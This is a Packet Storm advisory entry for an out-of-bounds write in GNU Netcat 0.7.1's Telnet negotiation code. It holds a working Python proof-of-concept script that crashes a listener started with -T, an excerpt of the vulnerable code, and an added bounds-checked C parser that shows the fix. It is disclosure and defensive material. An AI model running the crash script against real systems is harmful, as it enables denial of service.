GNU Netcat 0.7.1 Out-Of-Bounds Write

2016-12-05T00:00:00
ID PACKETSTORM:140025
Type packetstorm
Reporter n30m1nd
Modified 2016-12-05T00:00:00

Description

                                        
                                            `#/usr/bin/python  
#-*- Coding: utf-8 -*-  
  
### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ###   
  
# Date: 2016-11-19  
# Exploit Author: n30m1nd  
# Vendor Homepage: http://netcat.sourceforge.net/  
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download  
# Version: 0.7.1  
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux  
  
# Credits  
# =======  
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!  
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better. See you at AWE!  
  
# How to  
# ======  
# * Get a distribution that ships with GNU netcat or compile netcat from sources:
# * # Download  
# * tar -xzf netcat-0.7.1.tar.gz  
# * cd netcat-0.7.1/  
# * ./configure  
# * make  
# * # Netcat will be deployed in src/netcat  
#  
# * Set netcat to listen like the following:  
# * ./netcat -nlvp 12347 -T  
# * Just run this script on a different terminal  
#  
  
# Why?  
# ====  
# When Telnet negotiation is enabled (-T option), Netcat parses the incoming packets looking for Telnet control codes
# and runs them through buggy switch/case code.
# That code never checks that the index into the 4-byte getrq[] buffer stays in bounds, so a long control
# sequence results in an array out-of-bounds write.
  
# Vulnerable code
# ===============
# telnet.c
# ...
#  76 static unsigned char getrq[4];
#  77 static int l = 0;
#  78 unsigned char putrq[4], *buf = ncsock->recvq.pos;
# ...
#  88   /* loop all chars of the string */
#  89   for (i = 0; i < ref_size; i++) {
#  90     /* if we found IAC char OR we are fetching a IAC code string process it */
#  91     if ((buf[i] != TELNET_IAC) && (l == 0))
# ...
#  99     /* copy the char in the IAC-code-building buffer */
# 100     getrq[l++] = buf[i]; // BANG!
# ...
  
# Exploit code  
# ============  
  
import socket

RHOST = "127.0.0.1"
RPORT = 12347

print("[+] Connecting to %s:%d" % (RHOST, RPORT))
s = socket.create_connection((RHOST, RPORT))
s.send(b"\xFF")  # Telnet IAC control character: opens an IAC code sequence
print("[+] Telnet control character sent")
print("[i] Starting")
try:
    i = 0
    while True:  # loop until the listener crashes and the socket errors out
        i += 1
        s.send(b"\x30")  # each byte is appended to getrq[] without a bounds check
except socket.error:
    print("[+] GNU Netcat crashed on iteration: %d" % (i))
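As an added, defender-side illustration (not GNU Netcat's code and not the author's), the following C program reimplements the IAC-code accumulation pattern from the telnet.c listing above with the two checks the original lacks: the index into the 4-byte buffer is bounds-checked before every write, and an unrecognised command byte discards the partial sequence instead of leaving the index set. The Telnet byte values are the standard RFC 854 codes; the struct, the function names and the replayed byte stream (one IAC followed by 0x30 bytes, mirroring what the script sends) are this example's own constructions.

```c
/* Added example (not GNU Netcat's code): a bounds-safe variant of the
 * IAC-code accumulation pattern from telnet.c.  Names and the struct are
 * this example's own; the TELNET_* values are the RFC 854 command codes. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TELNET_IAC  0xFF
#define TELNET_DONT 0xFE
#define TELNET_DO   0xFD
#define TELNET_WONT 0xFC
#define TELNET_WILL 0xFB
#define TELNET_NOP  0xF1

#define GETRQ_SIZE 4                 /* same size as getrq[4] in telnet.c */

struct iac_parser {
    unsigned char getrq[GETRQ_SIZE]; /* IAC-code-building buffer */
    size_t l;                        /* bytes currently held in getrq */
    size_t dropped;                  /* malformed or unknown sequences discarded */
    size_t replies;                  /* DONT/WONT answers that would be sent */
};

/* Feed one byte.  Returns 1 if the byte belongs to an IAC sequence (and is
 * therefore removed from the data stream), 0 if it is an ordinary data byte. */
static int iac_feed(struct iac_parser *p, unsigned char c)
{
    if (c != TELNET_IAC && p->l == 0)
        return 0;                    /* plain data, nothing to negotiate */

    /* Guard 1: never write past getrq.  With the resets below this branch is
     * unreachable, but it is what turns a future logic slip into a dropped
     * sequence rather than an out-of-bounds write. */
    if (p->l >= GETRQ_SIZE) {
        p->l = 0;
        p->dropped++;
        if (c != TELNET_IAC)
            return 1;                /* resynchronise on the next IAC */
    }

    p->getrq[p->l++] = c;
    if (p->l == 1)
        return 1;                    /* only the IAC itself so far */

    switch (p->getrq[1]) {
    case TELNET_NOP:                 /* two-byte command, nothing to answer */
        p->l = 0;
        return 1;
    case TELNET_DO:
    case TELNET_DONT:
    case TELNET_WILL:
    case TELNET_WONT:                /* three-byte commands: wait for the option byte */
        if (p->l < 3)
            return 1;
        p->replies++;                /* a real implementation sends IAC DONT/WONT here */
        p->l = 0;
        return 1;
    default:
        /* Guard 2: an unknown command byte discards the partial sequence, so
         * the index can never keep growing across unrecognised input. */
        p->l = 0;
        p->dropped++;
        return 1;
    }
}

/* Parse a whole buffer; returns the number of data bytes that survive. */
static size_t iac_parse(struct iac_parser *p, const unsigned char *buf, size_t n)
{
    size_t kept = 0;
    for (size_t i = 0; i < n; i++)
        if (!iac_feed(p, buf[i]))
            kept++;
    return kept;
}

/* Replays the byte stream the script above sends: one IAC followed by
 * `count` 0x30 bytes (constructed input, capped at 1024).  Returns the number
 * of sequences dropped; getrq is never written beyond GETRQ_SIZE. */
static size_t replay_iac_then_zeros(size_t count, size_t *kept_out)
{
    struct iac_parser p;
    unsigned char stream[1025];
    memset(&p, 0, sizeof p);
    if (count > sizeof stream - 1)
        count = sizeof stream - 1;
    stream[0] = TELNET_IAC;
    memset(stream + 1, 0x30, count);
    size_t kept = iac_parse(&p, stream, count + 1);
    if (kept_out)
        *kept_out = kept;
    return p.dropped;
}

int main(void)
{
    size_t kept = 0;
    size_t dropped = replay_iac_then_zeros(1024, &kept);
    printf("dropped=%zu kept=%zu\n", dropped, kept);
    return 0;
}
```

Compile with `cc -std=c99 example.c && ./a.out`: the replay reports one dropped sequence (IAC followed by the unknown code 0x30) and treats the remaining 0x30 bytes as plain data, whereas the original loop keeps appending them to getrq[] past its fourth element.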